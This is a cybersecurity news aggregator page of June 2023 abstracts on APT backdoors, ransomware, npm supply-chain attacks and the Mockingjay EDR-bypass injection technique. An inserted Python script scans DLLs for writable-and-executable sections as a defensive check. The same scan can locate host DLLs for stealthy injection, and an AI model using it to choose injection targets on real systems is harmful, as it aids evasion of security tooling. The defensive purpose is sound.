
June, 2023

June 30, 2023 – General

Japan Threat Landscape Takes on Global Significance Full Text

Abstract The primary cause of cyberattacks against Japanese computer systems is the strength and quality of its manufacturing base. The size of Japanese manufacturers makes them an attractive target for criminal extortion.

Cyware

June 30, 2023 – Hacker

Iranian Hackers Charming Kitten Utilize POWERSTAR Backdoor in Targeted Espionage Attacks Full Text

Abstract Charming Kitten, the nation-state actor affiliated with Iran's Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR. "There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence," Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week. The threat actor is something of an expert when it comes to employing social engineering to lure targets, often crafting tailored fake personas on social media platforms and engaging in sustained conversations to build rapport before sending a malicious link. It's also tracked under the names APT35, Cobalt Illusion, Mint Sandstorm (formerly Phosphorus), and Yellow Garuda. Recent intrusions orchestrated by Charming Kitten have made use of other implants such as PowerLess and BellaCiao

The Hacker News

June 30, 2023 – APT

Iran-linked Charming Kitten APT enhanced its POWERSTAR Backdoor Full Text

Abstract Iran-linked Charming Kitten group used an updated version of the PowerShell backdoor called POWERSTAR in a spear-phishing campaign. Security firm Volexity observed the Iran-linked Charming Kitten (aka APT35, Phosphorus, Newscaster, and Ajax Security Team)...

Security Affairs

June 30, 2023 – General

3 Reasons SaaS Security is the Imperative First Step to Ensuring Secure AI Usage Full Text

Abstract In today's fast-paced digital landscape, the widespread adoption of AI (Artificial Intelligence) tools is transforming the way organizations operate. From chatbots to generative AI models, these SaaS-based applications offer numerous benefits, from enhanced productivity to improved decision-making. Employees using AI tools experience the advantages of quick answers and accurate results, enabling them to perform their jobs more effectively and efficiently. This popularity is reflected in the staggering numbers associated with AI tools. OpenAI's viral chatbot, ChatGPT, has amassed approximately 100 million users worldwide, while other generative AI tools like DALL·E and Bard have also gained significant traction for their ability to generate impressive content effortlessly. The generative AI market is projected to exceed $22 billion by 2025, indicating the growing reliance on AI technologies. However, amidst the enthusiasm surrounding AI adoption, it is imperative to address

The Hacker News

June 30, 2023 – Vulnerabilities

miniOrange’s WordPress Social Login and Register plugin was affected by a critical auth bypass bug Full Text

Abstract A critical authentication bypass flaw in miniOrange’s WordPress Social Login and Register plugin can allow gaining access to any account on a site. Wordfence researchers discovered an authentication bypass vulnerability in miniOrange’s WordPress...

Security Affairs

June 30, 2023 – Solution

WhatsApp Upgrades Proxy Feature Against Internet Shutdowns Full Text

Abstract Meta's WhatsApp has rolled out updates to its proxy feature, allowing more flexibility in the kind of content that can be shared in conversations. This includes the ability to send and receive images, voice notes, files, stickers and GIFs, WhatsApp told The Hacker News. The new features were first reported by BBC Persian. Some of the other improvements include streamlined steps to simplify the setup process as well as the introduction of shareable links to "share functioning/valid proxy addresses to their contacts for easy and automatic installation." Support for proxy servers was officially launched by the messaging service earlier this January, thereby helping users circumvent government-imposed censorship and internet shutdowns and obtain indirect access to WhatsApp. The company has also made available a reference implementation for setting up a proxy server with ports 80, 443 or 5222 available and a domain name that points to the server's IP address.

The Hacker News

June 30, 2023 – APT

North Korea-linked Andariel APT used a new malware named EarlyRat last year Full Text

Abstract North Korea-linked cyberespionage group Andariel used a previously undocumented malware called EarlyRat. Kaspersky researchers reported that the North Korea-linked APT group Andariel used a previously undocumented malware dubbed EarlyRat in...

Security Affairs

June 30, 2023 – Criminals

Cybercriminals Hijacking Vulnerable SSH Servers in New Proxyjacking Campaign Full Text

Abstract An active financially motivated campaign is targeting vulnerable SSH servers to covertly ensnare them into a proxy network. "This is an active campaign in which the attacker leverages SSH for remote access, running malicious scripts that stealthily enlist victim servers into a peer-to-peer (P2P) proxy network, such as Peer2Profit or Honeygain," Akamai researcher Allen West said in a Thursday report. Unlike cryptojacking, in which a compromised system's resources are used to illicitly mine cryptocurrency, proxyjacking offers the ability for threat actors to leverage the victim's unused bandwidth to covertly run different services as a P2P node. This offers two-fold benefits: It not only enables the attacker to monetize the extra bandwidth with a significantly reduced resource load that would be necessary to carry out cryptojacking, it also reduces the chances of discovery. "It is a stealthier alternative to cryptojacking and has serious implications that ca

The Hacker News

June 30, 2023 – General

MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk? Full Text

Abstract MITRE has released its annual list of the Top 25 "most dangerous software weaknesses" for the year 2023. "These weaknesses lead to serious vulnerabilities in software," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said. "An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working." The list is based on an analysis of public vulnerability data in the National Vulnerability Database (NVD) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity. Coming out top is Out-of-bounds Write, followed by Cross-site Scripting, SQL Injection, Use After Free, OS Command Injection, Improper Input Validation, Out-of-bounds Read, Path Traversal, Cross-Site Request Forgery (CSRF), and Unrestricted Upload of File with Dangerous Type. Out-of

The Hacker News

June 29, 2023 – Attack

8Base Ransomware Activity Spikes, Researchers Warn Full Text

Abstract Ransomware threat 8Base has been conducting double extortion attacks for over a year and its activities spiked suddenly in May and June 2023. 8Base has been connected to 67 attacks by Malwarebytes and NCC Group. Approximately 50% of the targeted victims belong to the business services, manufacturin ...

Cyware

June 29, 2023 – Hacker

From MuddyC3 to PhonyC2: Iran’s MuddyWater Evolves with a New Cyber Weapon Full Text

Abstract The Iranian state-sponsored group dubbed MuddyWater has been attributed to a previously unseen command-and-control (C2) framework called PhonyC2 that's been put to use by the actor since 2021. Evidence shows that the custom made, actively developed framework has been leveraged in the February 2023 attack on Technion, an Israeli research institute, cybersecurity firm Deep Instinct said in a report shared with The Hacker News. What's more, additional links have been unearthed between the Python 3-based program and other attacks carried out by MuddyWater, including the ongoing exploitation of PaperCut servers. "It is structurally and functionally similar to MuddyC3, a previous MuddyWater custom C2 framework that was written in Python 2," security researcher Simon Kenin said. "MuddyWater is continuously updating the PhonyC2 framework and changing TTPs to avoid detection." MuddyWater, also known as Mango Sandstorm (previously Mercury), is a cyber

The Hacker News

June 29, 2023 – Breach

The phone monitoring app LetMeSpy disclosed a data breach Full Text

Abstract Android app LetMeSpy disclosed a security breach, sensitive data associated with thousands of Android users were exposed. The phone monitoring app LetMeSpy disclosed a security breach, threat actors have stolen sensitive data associated with thousands...

Security Affairs

June 29, 2023 – Government

European Cyber Agency Remains Underfunded Full Text

Abstract There are multiple discrepancies in how the European Commission allocates funds to the cyber agency, Juhan Lepassaar, the executive director of the EU Agency for Cybersecurity, said during a Tuesday parliamentary hearing evaluating allocated budgets.

Cyware

June 29, 2023 – Malware

Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes Full Text

Abstract Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse. The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its attacks on users located in East Asia through rogue apps masquerading as ETC and VPBank Neo, which are popular in Taiwan and Vietnam. The initial intrusion vector for the malware is phishing. The ultimate goal of the app is to steal credentials, credit card details, and two-factor authentication (2FA) codes received as SMS to a remote server under the control of the threat actors. The latest findings from Fortinet, which reverse-engineered a Fluhorse sample uploaded to VirusTotal on June 11, 2023, suggest that the malware has evolved, incorporating additional sophistication b

The Hacker News

June 29, 2023 – Malware

Previously undetected ThirdEye malware appears in the threat landscape Full Text

Abstract A new Windows information stealer dubbed ThirdEye appeared in the threat landscape, it has been active since April. Fortinet FortiGuard Labs discovered a previously undetected information stealer named ThirdEye. The malicious code is not sophisticated...

Security Affairs

June 29, 2023 – Vulnerabilities

Details Disclosed for Critical SAP Vulnerabilities, Including Wormable Exploit Chain Full Text

Abstract The vulnerabilities are tracked as CVE-2021-27610, CVE-2021-33677, CVE-2021-33684, and CVE-2023-0014, and they impact products that use the SAP Application Server for ABAP component.

Cyware

June 29, 2023 – Solution

The Right Way to Enhance CTI with AI (Hint: It’s the Data) Full Text

Abstract Cyber threat intelligence is an effective weapon in the ongoing battle to protect digital assets and infrastructure - especially when combined with AI. But AI is only as good as the data feeding it. Access to unique, underground sources is key. Threat Intelligence offers tremendous value to people and companies. At the same time, its ability to address organizations' cybersecurity needs and the benefits it offers vary by company, industry, and other factors. A common challenge with cyber threat intelligence (CTI) is that the data it produces can be vast and overwhelming, creating confusion and inefficiencies among security teams' threat exposure management efforts. Additionally, organizations have different levels of security maturity, which can make access to and understanding of CTI data difficult. Enter generative AI. Many cybersecurity companies – and more specifically, threat intelligence companies – are bringing generative AI to market to simplify threat intelligence a

The Hacker News

June 29, 2023 – Criminals

Former Group-IB manager has been arrested in Kazakhstan Full Text

Abstract The former head of network security at Group-IB has been arrested in Kazakhstan based on a request from U.S. law enforcement. Nikita Kislitsin who worked as the head of network security at Group-IB, as well as its Russian-based spinoff company (known...

Security Affairs

June 29, 2023 – General

Saudi Arabia’s Cyber Capabilities Ranked Second Globally Full Text

Abstract According to the IIMD, the development of a National Cybersecurity Authority (NCA) and the planned development of a Global Cybersecurity Forum institute in the country have both affirmed Saudi Arabia's role in the field of cybersecurity.

Cyware

June 29, 2023 – Hacker

North Korean Hacker Group Andariel Strikes with New EarlyRat Malware Full Text

Abstract The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 (aka BlueNoroff) and other subordinate elements collectively tracked under the umbrella name Lazarus Group. The threat actor, besides conducting espionage attacks against foreign government and military entities that are of strategic interest, is known to carry out cyber crime as an extra source of income to the sanctions-hit nation. Some of the key cyber weapons in its arsenal include a ransomware strain referred to as Maui and numerous remote access trojans and backd

The Hacker News

June 29, 2023 – Vulnerabilities

Experts published PoC exploits for Arcserve UDP authentication bypass issue Full Text

Abstract Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity bypass authentication flaw, tracked as CVE-2023-26258, in its Unified...

Security Affairs

June 29, 2023 – Government

Cyber Command to expand ‘canary in the coal mine’ unit working with private sector Full Text

Abstract U.S. Cyber Command is doubling the size of a little-known program that serves as one of the military's chief links to private industry in order to bolster the country’s defenses against cyber threats.

Cyware

June 29, 2023 – Breach

Android Spy App LetMeSpy Suffers Major Data Breach, Exposing Users’ Personal Data Full Text

Abstract Android-based phone monitoring app LetMeSpy has disclosed a security breach that allowed an unauthorized third-party to steal sensitive data associated with thousands of Android users. "As a result of the attack, the criminals gained access to email addresses, telephone numbers and the content of messages collected on accounts," LetMeSpy said in an announcement on its website, noting the incident took place on June 21, 2023. Following the discovery of the hack, LetMeSpy said it notified law enforcement and data protection authorities. It's also taking steps to suspend all account-related functions until further notice. The identity of the threat actor and their motives are currently unknown. The work of a Polish company named Radeal, LetMeSpy is offered as a monthly subscription ($6 for Standard or $12 for Pro), allowing its customers to snoop on others simply by installing the software on their devices. An Internet Archive snapshot from December 2013 shows that i

The Hacker News

June 29, 2023 – Hacker

Manic Menagerie 2.0: The Evolution of a Highly Motivated Threat Actor Full Text

Abstract The threat actor used a variety of tactics, techniques, and tools to evade detection and maintain access to the compromised networks, including deploying web shells, exploiting vulnerabilities, and attempting local privilege escalation.

Cyware

June 29, 2023 – Vulnerabilities

Critical Security Flaw in Social Login Plugin for WordPress Exposes Users’ Accounts Full Text

Abstract A critical security flaw has been disclosed in miniOrange's Social Login and Register plugin for WordPress that could enable a malicious actor to log in as any user, provided the user's email address is already known. Tracked as CVE-2023-2982 (CVSS score: 9.8), the authentication bypass flaw impacts all versions of the plugin, including and prior to 7.6.4. It was addressed on June 14, 2023, with the release of version 7.6.5 following responsible disclosure on June 2, 2023. "The vulnerability makes it possible for an unauthenticated attacker to gain access to any account on a site including accounts used to administer the site, if the attacker knows, or can find, the associated email address," Wordfence researcher István Márton said. The issue is rooted in the fact that the encryption key used to secure the information during login using social media accounts is hard-coded, thus leading to a scenario where attackers could create a valid request with a properl

The Hacker News

June 29, 2023 – Ransomware

Dark Power Ransomware on the Ascent – A Technical Insight into 2023’s Latest Ransomware Strain Full Text

Abstract Dark Power is a highly advanced ransomware strain that uses advanced encryption techniques and targets various industries globally. It stops critical system services and processes, encrypts files, and drops a ransom note with payment instructions.

Cyware

June 29, 2023 – Malware

Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data Full Text

Abstract A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK Rules for issuing sick leaves.pdf.exe." The arrival vector for the malware is presently unknown, although the nature of the lure points to it being used in a phishing campaign. The very first ThirdEye sample was uploaded to VirusTotal on April 4, 2023, with relatively fewer features. The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, registered usernames, and volume information. The amassed details are then tra

The Hacker News

June 29, 2023 – Criminals

Security analyst wanted by both Russia and the US Full Text

Abstract A Russian network security specialist and former editor of Hacker magazine who is wanted by the US and Russia on cybercrime charges has been detained in Kazakhstan as the two governments seek his extradition.

Cyware

June 29, 2023 – Breach

US Patent and Trademark Office Notifies Filers of Years-Long Data Leak Full Text

Abstract The U.S. Patent and Trademark Office (USPTO) said in a notice sent to affected trademark applicants that their private domicile address — often their home address — inadvertently appeared in public records between February 2020 and March 2023.

Cyware

June 28, 2023 – Solution

Microsoft Sysmon now detects when executable files are created Full Text

Abstract Microsoft has released Sysmon 15, converting it into a protected process and adding the new 'FileExecutableDetected' option to log when executable files are created.

BleepingComputer

June 28, 2023 – Malware

Infectious NPM and PyPI Packages Raise Fresh Supply Chain Concerns Full Text

Abstract Security researchers have laid bare an ongoing attack campaign that specifically targets the npm ecosystem via a pair of malicious packages. Meanwhile, another researcher group reported seven malicious PyPI packages. Developers, package maintainers, and users must remain diligent in verifying the i ...

Cyware

June 28, 2023 – Vulnerabilities

Alert: New Electromagnetic Attacks on Drones Could Let Attackers Take Control Full Text

Abstract Drones that don't have any known security weaknesses could be the target of electromagnetic fault injection (EMFI) attacks, potentially enabling a threat actor to achieve arbitrary code execution and compromise their functionality and safety. The research comes from IOActive, which found that it is "feasible to compromise the targeted device by injecting a specific EM glitch at the right time during a firmware update." "This would allow an attacker to gain code execution on the main processor, gaining access to the Android OS that implements the core functionality of the drone," Gabriel Gonzalez, director of hardware security at the company, said in a report published this month. The study, which was undertaken to determine the current security posture of Unmanned Aerial Vehicles (UAVs), was carried out on Mavic Pro, a popular quadcopter drone manufactured by DJI that employs various security features like signed and encrypted firmware, Trusted Executi

The Hacker News

June 28, 2023 – Attack

Using Electromagnetic Fault Injection Attacks to take over drones Full Text

Abstract Electromagnetic fault injection (EMFI) attacks on drones can potentially allow attackers to achieve arbitrary code execution and take over them. While the use of drones continues to grow, researchers from IOActive analyzed how to develop fault injection...

Security Affairs

June 28, 2023 – Vulnerabilities

Exploit released for new Arcserve UDP auth bypass vulnerability Full Text

Abstract Data protection vendor Arcserve has addressed a high-severity security flaw in its Unified Data Protection (UDP) backup software that can let attackers bypass authentication and gain admin privileges.

BleepingComputer

June 28, 2023 – Vulnerabilities

Numerous Devices Discovered Violating CISA’s BOD Full Text

Abstract Censys has recently analyzed the attack surfaces of over 50 FCEB organizations and detected several hundred devices to be publicly exposed to a variety of cybersecurity threats. They are not secured according to CISA’s latest Binding Operational Directive (BOD). Moreover, software programs suc ...

Cyware

June 28, 2023 – Criminals

CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million Full Text

Abstract Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto platforms, setting up a scam infrastructure spanning over 350 domains hosted on more than 80 servers, Group-IB said in a deep-dive report. The Singapore-headquartered company described the criminal outfit as "operated by a hierarchy of kingpins, sales agents, developers, and call center operators" who are recruited to ensnare potential victims by promising high returns on their capital. "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as 'managers' and creating fake landing pages, socia

The Hacker News

June 28, 2023 – General

Experts warn of a spike in May and June of 8Base ransomware attacks Full Text

Abstract Researchers warn of a massive spike in May and June 2023 of the activity associated with the ransomware group named 8Base. VMware Carbon Black researchers observed an intensification of the activity associated with a stealthy ransomware group named 8Base....

Security Affairs

June 28, 2023 – Ransomware

Linux version of Akira ransomware targets VMware ESXi servers Full Text

Abstract The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide.

BleepingComputer

June 28, 2023 – Business

Astrix Security, which uses ML to secure app integrations, raises $25M Full Text

Abstract Astrix Security, a platform that helps companies manage and secure third-party app integrations, today announced that it closed a $25 million Series A funding round led by CRV with participation from Bessemer Venture Partners and F2 Venture Capital.

Cyware

June 28, 2023 – Education

5 Things CISOs Need to Know About Securing OT Environments Full Text

Abstract For too long the cybersecurity world focused exclusively on information technology (IT), leaving operational technology (OT) to fend for itself. Traditionally, few industrial enterprises had dedicated cybersecurity leaders. Any security decisions that arose fell to the plant and factory managers, who are highly skilled technical experts in other areas but often lack cybersecurity training or knowledge. In more recent years, an uptick in cyberattacks against industrial facilities and the trend of IT/OT convergence driven by Industry 4.0 have highlighted the vacuum of ownership around OT security. According to a new Fortinet report, most organizations are looking to Chief Information Security Officers (CISOs) to solve the problem. Fortunately, CISOs are no strangers to change or difficult challenges. The position itself is less than 20 years old, yet in those two decades CISOs have navigated some of the most disruptive cybersecurity events that were truly watershed moments in techno

The Hacker News

June 28, 2023 – Vulnerabilities

Critical SQL Injection flaws in Gentoo Soko can lead to Remote Code Execution Full Text

Abstract SQL injection vulnerabilities in Gentoo Soko could lead to remote code execution (RCE) on impacted systems. SonarSource researchers discovered two SQL injection vulnerabilities in Gentoo Soko, collectively tracked as CVE-2023-28424 (CVSS score: 9.1)...

Security Affairs

June 28, 2023 – Solution

Brave Browser boosts privacy with new local resources restrictions Full Text

Abstract The Brave team has announced that the privacy-centric browser will soon introduce new restriction controls allowing users to specify how long sites can access local network resources.

BleepingComputer

June 28, 2023 – Vulnerabilities

NPM Registry Found to be Vulnerable to ‘Manifest Confusion’ Abuse Full Text

Abstract The npm Public Registry, a database of JavaScript packages, fails to compare npm package manifest data with the archive of files that data describes, creating an opportunity for the installation and execution of malicious files.

Cyware

June 28, 2023 – Ransomware

8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses Full Text

Abstract A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023. "The group utilizes encryption paired with 'name-and-shame' techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries." 8Base, according to statistics gathered by Malwarebytes and NCC Group, has been linked to 67 attacks as of May 2023, with about 50% of the victims operating in the business services, manufacturing, and construction sectors. A majority of the targeted companies are located in the U.S. and Brazil. With very little known about the operators of the ransomware, its origins remain something of a cipher. What's evident is that it has been active sinc

The Hacker News

June 28, 2023 – Criminals

EncroChat dismantling led to 6,558 arrests and the seizure of $979M in criminal funds Full Text

Abstract Europol announced that the takedown of the EncroChat encrypted chat network has led to the arrest of 6,558 people and the seizure of $979 million in illicit funds. Europol announced that the dismantling of the encrypted chat network EncroChat has led to the arrest...

Security Affairs

June 28, 2023 – Vulnerabilities

NPM ecosystem at risk from “Manifest Confusion” attacks Full Text

Abstract The NPM (Node Package Manager) registry suffers from a security lapse called "manifest confusion," which undermines the trustworthiness of packages and makes it possible for attackers to hide malware in dependencies or perform malicious script execution during installation.

BleepingComputer

June 28, 2023 – Phishing

Ukraine Cracks Down on Investment Scams, Raids Call Centers Full Text

Abstract Ukrainian cyber police raided and closed over a dozen fraudulent call centers last week, saying the operations were running fake investment scams that involved stealing cryptocurrency and payment card details from European and Central Asian citizens.

Cyware

June 28, 2023 – Vulnerabilities

Critical SQL Injection Flaws Expose Gentoo Soko to Remote Code Execution Full Text

Abstract Multiple SQL injection vulnerabilities have been disclosed in Gentoo Soko that could lead to remote code execution (RCE) on vulnerable systems. "These SQL injections happened despite the use of an Object-Relational Mapping (ORM) library and prepared statements," SonarSource researcher Thomas Chauchefoin said, adding they could result in RCE on Soko because of a "misconfiguration of the database." The two issues, which were discovered in the search feature of Soko, have been collectively tracked as CVE-2023-28424 (CVSS score: 9.1). They were addressed within 24 hours of responsible disclosure on March 17, 2023. Soko is a Go software module that powers packages.gentoo.org, offering users an easy way to search through different Portage packages that are available for Gentoo Linux distribution. But the shortcomings identified in the service meant that it could have been possible for a malicious actor to inject specially crafted code, resulting in the expo

The Hacker News

June 28, 2023 – General

The Current State of Business Email Compromise Attacks Full Text

Abstract Business Email Compromise (BEC) poses a growing threat to businesses of all sizes. Learn more from Specops Software about the types of BEC attacks and how to avoid them.

BleepingComputer

June 28, 2023 – Breach

Victim Count in Ransomware Attack at Maryland Healthcare Provider Jumps Fivefold to 137,000 Full Text

Abstract A Berlin, Maryland-based hospital recently told regulators that a ransomware breach discovered in January had compromised the sensitive information of nearly 137,000 patients, about five times the number of people originally estimated to be affected.

Cyware

June 28, 2023 – Criminals

8Base ransomware gang escalates double extortion attacks in June Full Text

Abstract The 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June.

BleepingComputer

June 28, 2023 – Business

Cyera Raises $100M to Bring Data Protection to Hybrid Cloud Full Text

Abstract The startup, founded by longtime Israeli Military Intelligence leaders, landed the Accel-led $100 million Series B funding to support the cloud and on-premises data protection needs of hybrid organizations.

Cyware

June 28, 2023 – Policy and Law

SolarWinds says SEC investigation ‘progressing to charges’ Full Text

Abstract SolarWinds — the technology firm at the center of a December 2020 hack that affected multiple U.S. government agencies — said its executives may soon face charges from the Securities and Exchange Commission (SEC) for its response to the incident.

Cyware

June 28, 2023 – Government

UAE, Israel create ‘Crystal Ball’ platform to fight hackers Full Text

Abstract The mission is to “design, deploy and enable regional intelligence enhancement” through collaboration and knowledge-sharing to combat national-level cyberthreats, according to a presentation by Mohamed Al Kuwaiti, UAE head of cybersecurity.

Cyware

June 27, 2023 – Breach

Siemens Energy confirms data breach after MOVEit data-theft attack Full Text

Abstract Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform.

BleepingComputer

June 27, 2023 – Policy and Law

Hundreds of devices found violating new CISA federal agency directive Full Text

Abstract Censys researchers have discovered hundreds of Internet-exposed devices on the networks of U.S. federal agencies that have to be secured according to a recently issued CISA Binding Operational Directive.

BleepingComputer

June 27, 2023 – Criminals

EncroChat takedown led to 6,500 arrests and $979 million seized Full Text

Abstract Europol announced today that the takedown of the EncroChat encrypted mobile communications platform has led to the arrest of over 6,500 people and the seizure of $979 million in illicit funds.

BleepingComputer

June 27, 2023 – General

Just released: Session tracks for Mandiant’s 2023 mWISE event Full Text

Abstract There are just a few days left to get the lowest price available for the mWISE cybersecurity conference. It runs from September 18 - 20, 2023 in Washington, DC. If you register now, you'll get 45% off the standard conference rate.

BleepingComputer

June 27, 2023 – Malware

New Mockingjay process injection technique evades EDR detection Full Text

Abstract A new process injection technique named 'Mockingjay' could allow threat actors to bypass EDR (Endpoint Detection and Response) and other security products to stealthily execute malicious code on compromised systems.

BleepingComputer

June 27, 2023 – Malware

Hackers Steal Messages, Call Logs, and Locations Intercepted by Phone Monitoring App Full Text

Abstract The phone monitoring app, which is used to spy on thousands of people using Android phones, said in a notice on its login page that on June 21, “a security incident occurred involving obtaining unauthorized access to the data of website users.”

Cyware

June 27, 2023 – Malware

New Mockingjay Process Injection Technique Could Let Malware Evade Detection Full Text

Abstract A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The uniqueness of this technique is that it requires a vulnerable DLL and copying code to the right section." Process injection is an attack method that allows adversaries to inject code into processes in order to evade process-based defenses and elevate privileges. In doing so, it could allow for the execution of arbitrary code in the memory space of a separate live process. Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, amon

The Hacker News

June 27, 2023 – Malware

Mockingjay process injection technique allows EDR bypass Full Text

Abstract Mockingjay is a new process injection technique that can be exploited to bypass security solutions to execute malware on compromised systems. A new process injection technique dubbed Mockingjay can be exploited by attackers to bypass security controls...

Security Affairs
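
The three Mockingjay items above (BleepingComputer, The Hacker News and Security Affairs) turn on the same detail: the injection needs no memory allocation and no permission change because it copies code into a section of an already-loaded DLL that is mapped both writable and executable. Read together, the two quoted sentences imply that the "vulnerable DLL" is one that ships with such a section, so a defender's first question is which DLLs on a host carry one. The following added example is not code from Security Joes or from any of the linked write-ups: it parses a PE section table with only the Python standard library and lists sections whose characteristics set both IMAGE_SCN_MEM_EXECUTE and IMAGE_SCN_MEM_WRITE. The header-only sample image it builds is a constructed test fixture, not a real DLL, and its section names are invented.

```python
import struct

# Section characteristic flags from the PE/COFF specification.
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PtrRawData, PtrRelocs, PtrLinenums,
# NumRelocs, NumLinenums, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"


def pe_sections(data):
    """Return [(name, virtual_size, characteristics), ...] from a PE image's section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    coff = e_lfanew + 4
    _, nsections, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, data, coff)
    # The section table starts right after the optional header, whatever its size.
    table = coff + struct.calcsize(COFF_HEADER) + opt_size
    sections = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_HEADER, data, table + i * struct.calcsize(SECTION_HEADER))
        name = fields[0].rstrip(b"\0").decode("ascii", "replace")
        sections.append((name, fields[1], fields[9]))
    return sections


def rwx_sections(data):
    """Names of sections that are writable AND executable: the property Mockingjay relies on."""
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [name for name, _size, flags in pe_sections(data) if flags & wx == wx]


def scan_file(path):
    with open(path, "rb") as f:
        return rwx_sections(f.read())


def build_sample_pe(sections):
    """Constructed header-only PE32+ fixture (not loadable) with the given (name, flags) sections."""
    opt_size = 240                                # size of a PE32+ optional header
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))   # e_lfanew: NT headers follow the DOS header
    coff = struct.pack(COFF_HEADER, 0x8664, len(sections), 0, 0, 0, opt_size, 0x2022)
    table = b"".join(
        struct.pack(SECTION_HEADER, name.encode(), 0x1000, 0x1000 * (i + 1), 0x1000, 0, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + table


if __name__ == "__main__":
    sample = build_sample_pe([
        (".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
        (".rwx", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    ])
    print("writable+executable sections:", rwx_sections(sample))
```

Run `scan_file` over the DLLs an application actually loads (the loaded-module list of a process, or the vendor's install directory) rather than the whole disk; a hit is not malware, it is a candidate that a Mockingjay-style loader could reuse, and the reasonable responses are to ask the vendor why the section is writable and executable and to watch for writes into that DLL's image from other processes.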

June 27, 2023 – Vulnerabilities

Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text

Abstract Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch (FCEB) organizations and sub-organizations and discovered more than 13,000 distinct hosts across 100 autonomous systems.

Cyware

June 27, 2023 – Attack

New Ongoing Campaign Targets npm Ecosystem with Unique Execution Chain Full Text

Abstract Cybersecurity researchers have discovered a new ongoing campaign aimed at the npm ecosystem that leverages a unique execution chain to deliver an unknown payload to targeted systems. "The packages in question seem to be published in pairs, each pair working in unison to fetch additional resources which are subsequently decoded and/or executed," software supply chain security firm Phylum said in a report released last week. To that end, the order in which the pair of packages are installed is paramount to pulling off a successful attack, as the first of the two modules is designed to store locally a token retrieved from a remote server. The campaign was first discovered on June 11, 2023. The second package subsequently passes this token as a parameter alongside the operating system type to an HTTP GET request to acquire a second script from the remote server. A successful execution returns a Base64-encoded string that is immediately executed but only if that string is

The Hacker News
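
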